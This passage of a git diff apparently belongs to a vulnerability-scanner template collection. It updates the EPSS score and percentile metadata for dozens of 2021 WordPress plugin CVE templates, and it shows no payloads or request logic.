CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24213 - epss-score: 0.03165 - epss-percentile: 0.86541 + epss-score: 0.02915 + epss-percentile: 0.85984 cwe-id: CWE-79 metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24214.yaml b/http/cves/2021/CVE-2021-24214.yaml index 7339275458c..7adf5286cfb 100644 --- a/http/cves/2021/CVE-2021-24214.yaml +++ b/http/cves/2021/CVE-2021-24214.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24214 cwe-id: CWE-79 epss-score: 0.04044 - epss-percentile: 0.88183 + epss-percentile: 0.88185 cpe: cpe:2.3:a:daggerhartlab:openid_connect_generic_client:3.8.0:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24215.yaml b/http/cves/2021/CVE-2021-24215.yaml index 18943375e87..e8429c3053f 100644 --- a/http/cves/2021/CVE-2021-24215.yaml +++ b/http/cves/2021/CVE-2021-24215.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24215 cwe-id: CWE-425,CWE-284 epss-score: 0.37383 - epss-percentile: 0.97053 + epss-percentile: 0.97055 cpe: cpe:2.3:a:wpruby:controlled_admin_access:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24219.yaml b/http/cves/2021/CVE-2021-24219.yaml index fe1644d10b3..c571daa27d7 100644 --- a/http/cves/2021/CVE-2021-24219.yaml +++ b/http/cves/2021/CVE-2021-24219.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24219 cwe-id: CWE-306,CWE-284 epss-score: 0.10122 - epss-percentile: 0.92879 + epss-percentile: 0.92873 cpe: cpe:2.3:a:thrivethemes:focusblog:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24220.yaml b/http/cves/2021/CVE-2021-24220.yaml index a28d5259dbe..ee1ef13dbb8 100644 --- a/http/cves/2021/CVE-2021-24220.yaml +++ b/http/cves/2021/CVE-2021-24220.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24220 cwe-id: CWE-434 epss-score: 0.53243 - epss-percentile: 0.97881 + epss-percentile: 0.97878 cpe: cpe:2.3:a:thrivethemes:focusblog:*:*:*:*:*:wordpress_:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24226.yaml b/http/cves/2021/CVE-2021-24226.yaml index f0a2c31475b..5127de5d067 100644 --- a/http/cves/2021/CVE-2021-24226.yaml +++ b/http/cves/2021/CVE-2021-24226.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24226 cwe-id: CWE-200 epss-score: 0.25403 - epss-percentile: 0.96041 + epss-percentile: 0.96044 cpe: cpe:2.3:a:accessally:accessally:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24227.yaml b/http/cves/2021/CVE-2021-24227.yaml index 24cae33cbb9..c7dce40391f 100644 --- a/http/cves/2021/CVE-2021-24227.yaml +++ b/http/cves/2021/CVE-2021-24227.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24227 cwe-id: CWE-200 epss-score: 0.33001 - epss-percentile: 0.96753 + epss-percentile: 0.96755 cpe: cpe:2.3:a:patreon:patreon_wordpress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24235.yaml b/http/cves/2021/CVE-2021-24235.yaml index 7a67698429a..45406f5586e 100644 --- a/http/cves/2021/CVE-2021-24235.yaml +++ b/http/cves/2021/CVE-2021-24235.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24235 cwe-id: CWE-79 epss-score: 0.26734 - epss-percentile: 0.96185 + epss-percentile: 0.96187 cpe: cpe:2.3:a:boostifythemes:goto:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24236.yaml b/http/cves/2021/CVE-2021-24236.yaml index 78edf9f9c2e..c781d2d1ffc 100644 --- a/http/cves/2021/CVE-2021-24236.yaml +++ b/http/cves/2021/CVE-2021-24236.yaml @@ -21,7 +21,7 @@ info: cve-id: "CVE-2021-24236" cwe-id: CWE-434 epss-score: 0.7493 - epss-percentile: 0.98825 + epss-percentile: 0.98822 cpe: cpe:2.3:a:imagements_project:imagements:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24237.yaml b/http/cves/2021/CVE-2021-24237.yaml index 6b17ff151e1..eb51a40a52b 100644 --- a/http/cves/2021/CVE-2021-24237.yaml +++ b/http/cves/2021/CVE-2021-24237.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24237 cwe-id: CWE-79 epss-score: 0.63261 - epss-percentile: 0.98332 + epss-percentile: 0.98333 cpe: cpe:2.3:a:purethemes:findeo:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24239.yaml b/http/cves/2021/CVE-2021-24239.yaml index bb1b781f98a..1c006a03a6a 100644 --- a/http/cves/2021/CVE-2021-24239.yaml +++ b/http/cves/2021/CVE-2021-24239.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24239 cwe-id: CWE-79 epss-score: 0.04595 - epss-percentile: 0.88911 + epss-percentile: 0.88909 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24274.yaml b/http/cves/2021/CVE-2021-24274.yaml index bb324c435aa..5749ef6d1ad 100644 --- a/http/cves/2021/CVE-2021-24274.yaml +++ b/http/cves/2021/CVE-2021-24274.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24274 cwe-id: CWE-79 epss-score: 0.05512 - epss-percentile: 0.89959 + epss-percentile: 0.89957 cpe: cpe:2.3:a:supsystic:ultimate_maps:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24276.yaml b/http/cves/2021/CVE-2021-24276.yaml index 01ec9c4dd4d..5001e136517 100644 --- a/http/cves/2021/CVE-2021-24276.yaml +++ b/http/cves/2021/CVE-2021-24276.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24276 cwe-id: CWE-79 epss-score: 0.08366 - epss-percentile: 0.9203 + epss-percentile: 0.92025 cpe: cpe:2.3:a:supsystic:contact_form:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24286.yaml b/http/cves/2021/CVE-2021-24286.yaml index f7e86f41830..73607b59e9e 100644 --- a/http/cves/2021/CVE-2021-24286.yaml +++ b/http/cves/2021/CVE-2021-24286.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24286 cwe-id: CWE-79 epss-score: 0.52303 - epss-percentile: 0.97832 + epss-percentile: 0.97828 cpe: cpe:2.3:a:mooveagency:redirect_404_to_parent:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24287.yaml b/http/cves/2021/CVE-2021-24287.yaml index 27f8c4f9531..d9655469bef 100644 --- a/http/cves/2021/CVE-2021-24287.yaml +++ b/http/cves/2021/CVE-2021-24287.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24287 cwe-id: CWE-79 epss-score: 0.33301 - epss-percentile: 0.96776 + epss-percentile: 0.96777 cpe: cpe:2.3:a:mooveagency:select_all_categories_and_taxonomies\,_change_checkbox_to_radio_buttons:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24288.yaml b/http/cves/2021/CVE-2021-24288.yaml index 34f0f2a873d..d2baa59291d 100644 --- a/http/cves/2021/CVE-2021-24288.yaml +++ b/http/cves/2021/CVE-2021-24288.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24288 cwe-id: CWE-601 epss-score: 0.04398 - epss-percentile: 0.88658 + epss-percentile: 0.88656 cpe: cpe:2.3:a:acymailing:acymailing:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24291.yaml b/http/cves/2021/CVE-2021-24291.yaml index 7e6d5478f01..05248a6c67b 100644 --- a/http/cves/2021/CVE-2021-24291.yaml +++ b/http/cves/2021/CVE-2021-24291.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24291 cwe-id: CWE-79 epss-score: 0.14622 - epss-percentile: 0.94267 + epss-percentile: 0.94264 cpe: cpe:2.3:a:10web:photo_gallery:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24295.yaml b/http/cves/2021/CVE-2021-24295.yaml index 48691dfb582..0361a147d44 100644 --- a/http/cves/2021/CVE-2021-24295.yaml +++ b/http/cves/2021/CVE-2021-24295.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24295 cwe-id: CWE-89 epss-score: 0.26068 - epss-percentile: 0.96122 + epss-percentile: 0.96125 cpe: cpe:2.3:a:cleantalk:spam_protection\,_antispam\,_firewall:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24298.yaml b/http/cves/2021/CVE-2021-24298.yaml index 82af23e9855..6db80558b2c 100644 --- a/http/cves/2021/CVE-2021-24298.yaml +++ b/http/cves/2021/CVE-2021-24298.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-24298 cwe-id: CWE-79 epss-score: 0.13939 - epss-percentile: 0.94112 + epss-percentile: 0.94107 cpe: cpe:2.3:a:ibenic:simple_giveaways:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24300.yaml b/http/cves/2021/CVE-2021-24300.yaml index 34e75e24886..52a05ecc863 100644 --- a/http/cves/2021/CVE-2021-24300.yaml +++ b/http/cves/2021/CVE-2021-24300.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24300 cwe-id: CWE-79 epss-score: 0.03405 - epss-percentile: 0.8708 + epss-percentile: 0.87079 cpe: cpe:2.3:a:pickplugins:product_slider_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24320.yaml b/http/cves/2021/CVE-2021-24320.yaml index 8b6bf4d534d..597ae9817db 100644 --- a/http/cves/2021/CVE-2021-24320.yaml +++ b/http/cves/2021/CVE-2021-24320.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24320 cwe-id: CWE-79 epss-score: 0.50348 - epss-percentile: 0.9775 + epss-percentile: 0.97745 cpe: cpe:2.3:a:bold-themes:bello:*:*:*:*:*:wordpress:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-24335.yaml b/http/cves/2021/CVE-2021-24335.yaml index b3fa1b9eb9e..bac8c51269a 100644 --- a/http/cves/2021/CVE-2021-24335.yaml +++ b/http/cves/2021/CVE-2021-24335.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24335 cwe-id: CWE-79 epss-score: 0.45587 - epss-percentile: 0.97507 + epss-percentile: 0.97502 cpe: cpe:2.3:a:smartdatasoft:car_repair_services_\&_auto_mechanic:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24342.yaml b/http/cves/2021/CVE-2021-24342.yaml index 22b8de10a17..49251b7cc2e 100644 --- a/http/cves/2021/CVE-2021-24342.yaml +++ b/http/cves/2021/CVE-2021-24342.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24342 cwe-id: CWE-79 epss-score: 0.02816 - epss-percentile: 0.85741 + epss-percentile: 0.85738 cpe: cpe:2.3:a:jnews:jnews:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24351.yaml b/http/cves/2021/CVE-2021-24351.yaml index a7b303dce2d..ed321c1566b 100644 --- a/http/cves/2021/CVE-2021-24351.yaml +++ b/http/cves/2021/CVE-2021-24351.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-24351 cwe-id: CWE-79 epss-score: 0.54267 - epss-percentile: 0.97931 + epss-percentile: 0.97929 cpe: cpe:2.3:a:posimyth:the_plus_addons_for_elementor:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24364.yaml b/http/cves/2021/CVE-2021-24364.yaml index 69cfcbd0ab9..7ae1608bb0e 100644 --- a/http/cves/2021/CVE-2021-24364.yaml +++ b/http/cves/2021/CVE-2021-24364.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24364 cwe-id: CWE-79 epss-score: 0.02314 - epss-percentile: 0.84373 + epss-percentile: 0.8437 cpe: cpe:2.3:a:tielabs:jannah:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24370.yaml b/http/cves/2021/CVE-2021-24370.yaml index 35c7f24749e..b1b03854b8c 100644 --- a/http/cves/2021/CVE-2021-24370.yaml +++ b/http/cves/2021/CVE-2021-24370.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-24370 cwe-id: CWE-434 epss-score: 0.80681 - epss-percentile: 0.99098 + epss-percentile: 0.99099 cpe: cpe:2.3:a:radykal:fancy_product_designer:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24387.yaml b/http/cves/2021/CVE-2021-24387.yaml index 663feab440a..f7055c12685 100644 --- a/http/cves/2021/CVE-2021-24387.yaml +++ b/http/cves/2021/CVE-2021-24387.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-24387 cwe-id: CWE-79 epss-score: 0.42184 - epss-percentile: 0.97328 + epss-percentile: 0.97325 cpe: cpe:2.3:a:contempothemes:real_estate_7:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24389.yaml b/http/cves/2021/CVE-2021-24389.yaml index 7f1eca4f895..3fd726684ab 100644 --- a/http/cves/2021/CVE-2021-24389.yaml +++ b/http/cves/2021/CVE-2021-24389.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24389 cwe-id: CWE-79 epss-score: 0.13968 - epss-percentile: 0.94117 + epss-percentile: 0.94113 cpe: cpe:2.3:a:chimpgroup:foodbakery:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24406.yaml b/http/cves/2021/CVE-2021-24406.yaml index cdd05c228d4..f89b43bfccb 100644 --- a/http/cves/2021/CVE-2021-24406.yaml +++ b/http/cves/2021/CVE-2021-24406.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24406 cwe-id: CWE-601 epss-score: 0.08523 - epss-percentile: 0.9212 + epss-percentile: 0.92114 cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24407.yaml b/http/cves/2021/CVE-2021-24407.yaml index 688bdf49a1b..008ca133917 100644 --- a/http/cves/2021/CVE-2021-24407.yaml +++ b/http/cves/2021/CVE-2021-24407.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24407 cwe-id: CWE-79 epss-score: 0.20956 - epss-percentile: 0.95456 + epss-percentile: 0.95457 cpe: cpe:2.3:a:tielabs:jannah:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24409.yaml b/http/cves/2021/CVE-2021-24409.yaml index c73e157e002..3c2fcea67e6 100644 --- a/http/cves/2021/CVE-2021-24409.yaml +++ b/http/cves/2021/CVE-2021-24409.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24409 cwe-id: CWE-79 epss-score: 0.13254 - epss-percentile: 0.93937 + epss-percentile: 0.93933 cpe: cpe:2.3:a:plugin-planet:prismatic:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24435.yaml b/http/cves/2021/CVE-2021-24435.yaml index 49ea9e3ec11..a20669bf50d 100644 --- a/http/cves/2021/CVE-2021-24435.yaml +++ b/http/cves/2021/CVE-2021-24435.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24435 cwe-id: CWE-79 epss-score: 0.13254 - epss-percentile: 0.93937 + epss-percentile: 0.93933 cpe: cpe:2.3:a:gambit:titan_framework:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24436.yaml b/http/cves/2021/CVE-2021-24436.yaml index cd20cee7f6b..745b9dfeee1 100644 --- a/http/cves/2021/CVE-2021-24436.yaml +++ b/http/cves/2021/CVE-2021-24436.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24436 cwe-id: CWE-79 epss-score: 0.05838 - epss-percentile: 0.90258 + epss-percentile: 0.9026 cpe: cpe:2.3:a:boldgrid:w3_total_cache:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24452.yaml b/http/cves/2021/CVE-2021-24452.yaml index df318033b37..c3f01844ed0 100644 --- a/http/cves/2021/CVE-2021-24452.yaml +++ b/http/cves/2021/CVE-2021-24452.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24452 cwe-id: CWE-79 epss-score: 0.09627 - epss-percentile: 0.92648 + epss-percentile: 0.92642 cpe: cpe:2.3:a:boldgrid:w3_total_cache:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24472.yaml b/http/cves/2021/CVE-2021-24472.yaml index 7728443ad53..590297051ea 100644 --- a/http/cves/2021/CVE-2021-24472.yaml +++ b/http/cves/2021/CVE-2021-24472.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24472 cwe-id: CWE-918 epss-score: 0.8982 - epss-percentile: 0.99546 + epss-percentile: 0.99548 cpe: cpe:2.3:a:qantumthemes:kentharadio:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24488.yaml b/http/cves/2021/CVE-2021-24488.yaml index 1a0ee80509c..68776740810 100644 --- a/http/cves/2021/CVE-2021-24488.yaml +++ b/http/cves/2021/CVE-2021-24488.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24488 cwe-id: CWE-79 epss-score: 0.11533 - epss-percentile: 0.93417 + epss-percentile: 0.93412 cpe: cpe:2.3:a:pickplugins:post_grid:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24498.yaml b/http/cves/2021/CVE-2021-24498.yaml index 90b75cf027a..3a575b4b430 100644 --- a/http/cves/2021/CVE-2021-24498.yaml +++ b/http/cves/2021/CVE-2021-24498.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24498 cwe-id: CWE-79 epss-score: 0.25481 - epss-percentile: 0.96049 + epss-percentile: 0.96052 cpe: cpe:2.3:a:dwbooster:calendar_event_multi_view:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24522.yaml b/http/cves/2021/CVE-2021-24522.yaml index f1d4918ae52..4730e1808bc 100644 --- a/http/cves/2021/CVE-2021-24522.yaml +++ b/http/cves/2021/CVE-2021-24522.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24522 cwe-id: CWE-79 epss-score: 0.00247 - epss-percentile: 0.47799 + epss-percentile: 0.47771 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N cvss-score: 5.4 metadata: diff --git a/http/cves/2021/CVE-2021-24554.yaml b/http/cves/2021/CVE-2021-24554.yaml index e6f03afca03..f4eed0bb907 100644 --- a/http/cves/2021/CVE-2021-24554.yaml +++ b/http/cves/2021/CVE-2021-24554.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-24554 cwe-id: CWE-89 epss-score: 0.40697 - epss-percentile: 0.97245 + epss-percentile: 0.97244 cpe: cpe:2.3:a:freelancetoindia:paytm-pay:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24627.yaml b/http/cves/2021/CVE-2021-24627.yaml index 37b542776d8..e24355984d8 100644 --- a/http/cves/2021/CVE-2021-24627.yaml +++ b/http/cves/2021/CVE-2021-24627.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24627 cwe-id: CWE-89 epss-score: 0.25395 - epss-percentile: 0.96039 + epss-percentile: 0.96042 cpe: cpe:2.3:a:g_auto-hyperlink_project:g_auto-hyperlink:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24657.yaml b/http/cves/2021/CVE-2021-24657.yaml index afa4978b790..5b7cd3fb18c 100644 --- a/http/cves/2021/CVE-2021-24657.yaml +++ b/http/cves/2021/CVE-2021-24657.yaml @@ -18,7 +18,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24657 epss-score: 0.01315 - epss-percentile: 0.79422 + epss-percentile: 0.79417 cwe-id: CWE-79 metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24666.yaml b/http/cves/2021/CVE-2021-24666.yaml index b63241b4091..c60f532b778 100644 --- a/http/cves/2021/CVE-2021-24666.yaml +++ b/http/cves/2021/CVE-2021-24666.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24666 cwe-id: CWE-89 epss-score: 0.80649 - epss-percentile: 0.99095 + epss-percentile: 0.99097 cpe: cpe:2.3:a:podlove:podlove_podcast_publisher:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24681.yaml b/http/cves/2021/CVE-2021-24681.yaml index c70ecd145f2..29639d16cca 100644 --- a/http/cves/2021/CVE-2021-24681.yaml +++ b/http/cves/2021/CVE-2021-24681.yaml @@ -19,8 +19,8 @@ info: cvss-score: 4.8 cve-id: CVE-2021-24681 cwe-id: CWE-79 - epss-score: 0.00681 - epss-percentile: 0.71069 + epss-score: 0.00502 + epss-percentile: 0.65385 cpe: cpe:2.3:a:duplicatepro:duplicate_page:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24731.yaml b/http/cves/2021/CVE-2021-24731.yaml index 438114cf7c6..b7a78304c52 100644 --- a/http/cves/2021/CVE-2021-24731.yaml +++ b/http/cves/2021/CVE-2021-24731.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24731 cwe-id: CWE-89 epss-score: 0.53132 - epss-percentile: 0.97872 + epss-percentile: 0.97868 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-24746.yaml b/http/cves/2021/CVE-2021-24746.yaml index e6e58936cb5..4f0b593dbf0 100644 --- a/http/cves/2021/CVE-2021-24746.yaml +++ b/http/cves/2021/CVE-2021-24746.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24746 cwe-id: CWE-79 epss-score: 0.02255 - epss-percentile: 0.84188 + epss-percentile: 0.84184 cpe: cpe:2.3:a:heateor:sassy_social_share:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24750.yaml b/http/cves/2021/CVE-2021-24750.yaml index 31152a410ef..99dea07ef50 100644 --- a/http/cves/2021/CVE-2021-24750.yaml +++ b/http/cves/2021/CVE-2021-24750.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24750 cwe-id: CWE-89 epss-score: 0.69584 - epss-percentile: 0.98599 + epss-percentile: 0.98601 cpe: cpe:2.3:a:wp_visitor_statistics_\(real_time_traffic\)_project:wp_visitor_statistics_\(real_time_traffic\):*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24762.yaml b/http/cves/2021/CVE-2021-24762.yaml index c30c8810601..c70c92224c6 100644 --- a/http/cves/2021/CVE-2021-24762.yaml +++ b/http/cves/2021/CVE-2021-24762.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24762 cwe-id: CWE-89 - epss-score: 0.84686 - epss-percentile: 0.99302 + epss-score: 0.85374 + epss-percentile: 0.99332 cpe: cpe:2.3:a:getperfectsurvey:perfect_survey:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24791.yaml b/http/cves/2021/CVE-2021-24791.yaml index c4e918352a1..f477ed25dca 100644 --- a/http/cves/2021/CVE-2021-24791.yaml +++ b/http/cves/2021/CVE-2021-24791.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24791 cwe-id: CWE-89 epss-score: 0.06309 - epss-percentile: 0.90672 + epss-percentile: 0.90673 cpe: cpe:2.3:a:draftpress:header_footer_code_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24838.yaml b/http/cves/2021/CVE-2021-24838.yaml index 03f2da68fad..90a7a79e339 100644 --- a/http/cves/2021/CVE-2021-24838.yaml +++ b/http/cves/2021/CVE-2021-24838.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24838 cwe-id: CWE-601 epss-score: 0.02345 - epss-percentile: 0.84468 + epss-percentile: 0.84465 cpe: cpe:2.3:a:bologer:anycomment:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24862.yaml b/http/cves/2021/CVE-2021-24862.yaml index a21a5252c6a..e14af4ef5da 100644 --- a/http/cves/2021/CVE-2021-24862.yaml +++ b/http/cves/2021/CVE-2021-24862.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24862 cwe-id: CWE-89 epss-score: 0.42876 - epss-percentile: 0.97371 + epss-percentile: 0.97369 cpe: cpe:2.3:a:metagauss:registrationmagic:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24875.yaml b/http/cves/2021/CVE-2021-24875.yaml index 7eb85dcd8ed..deefe6ed76f 100644 --- a/http/cves/2021/CVE-2021-24875.yaml +++ b/http/cves/2021/CVE-2021-24875.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24875 cwe-id: CWE-79 epss-score: 0.16493 - epss-percentile: 0.94687 + epss-percentile: 0.94685 cpe: cpe:2.3:a:implecode:ecommerce_product_catalog:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24876.yaml b/http/cves/2021/CVE-2021-24876.yaml index 88674e8cbbb..a3150942bfe 100644 --- a/http/cves/2021/CVE-2021-24876.yaml +++ b/http/cves/2021/CVE-2021-24876.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24876 cwe-id: CWE-79 epss-score: 0.00578 - epss-percentile: 0.68236 + epss-percentile: 0.68224 cpe: cpe:2.3:a:roundupwp:registrations_for_the_events_calendar:*:*:*:*:*:wordpress:*:* metadata: vendor: roundupwp diff --git a/http/cves/2021/CVE-2021-24878.yaml b/http/cves/2021/CVE-2021-24878.yaml index 58596417cf4..04208bbc534 100644 --- a/http/cves/2021/CVE-2021-24878.yaml +++ b/http/cves/2021/CVE-2021-24878.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24878 cwe-id: CWE-79 epss-score: 0.00864 - epss-percentile: 0.74634 + epss-percentile: 0.74616 cpe: cpe:2.3:a:supportcandy:supportcandy:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24891.yaml b/http/cves/2021/CVE-2021-24891.yaml index 0de0ed476da..724eef3ad60 100644 --- a/http/cves/2021/CVE-2021-24891.yaml +++ b/http/cves/2021/CVE-2021-24891.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24891 cwe-id: CWE-79 epss-score: 0.09482 - epss-percentile: 0.92585 + epss-percentile: 0.92578 cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-24910.yaml b/http/cves/2021/CVE-2021-24910.yaml index c61936cf844..4c740854791 100644 --- a/http/cves/2021/CVE-2021-24910.yaml +++ b/http/cves/2021/CVE-2021-24910.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24910 cwe-id: CWE-79 epss-score: 0.10373 - epss-percentile: 0.92988 + epss-percentile: 0.92981 cpe: cpe:2.3:a:transposh:transposh_wordpress_translation:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24917.yaml b/http/cves/2021/CVE-2021-24917.yaml index 9a11cce9cb6..ed05ffd224f 100644 --- a/http/cves/2021/CVE-2021-24917.yaml +++ b/http/cves/2021/CVE-2021-24917.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24917 cwe-id: CWE-863 epss-score: 0.74492 - epss-percentile: 0.98803 + epss-percentile: 0.988 cpe: cpe:2.3:a:wpserveur:wps_hide_login:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24926.yaml b/http/cves/2021/CVE-2021-24926.yaml index eaa974dc2ee..4ffdf142b48 100644 --- a/http/cves/2021/CVE-2021-24926.yaml +++ b/http/cves/2021/CVE-2021-24926.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24926 cwe-id: CWE-79 epss-score: 0.09793 - epss-percentile: 0.92726 + epss-percentile: 0.9272 cpe: cpe:2.3:a:domaincheckplugin:domain_check:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24934.yaml b/http/cves/2021/CVE-2021-24934.yaml index cd012d43229..a987c79b4a3 100644 --- a/http/cves/2021/CVE-2021-24934.yaml +++ 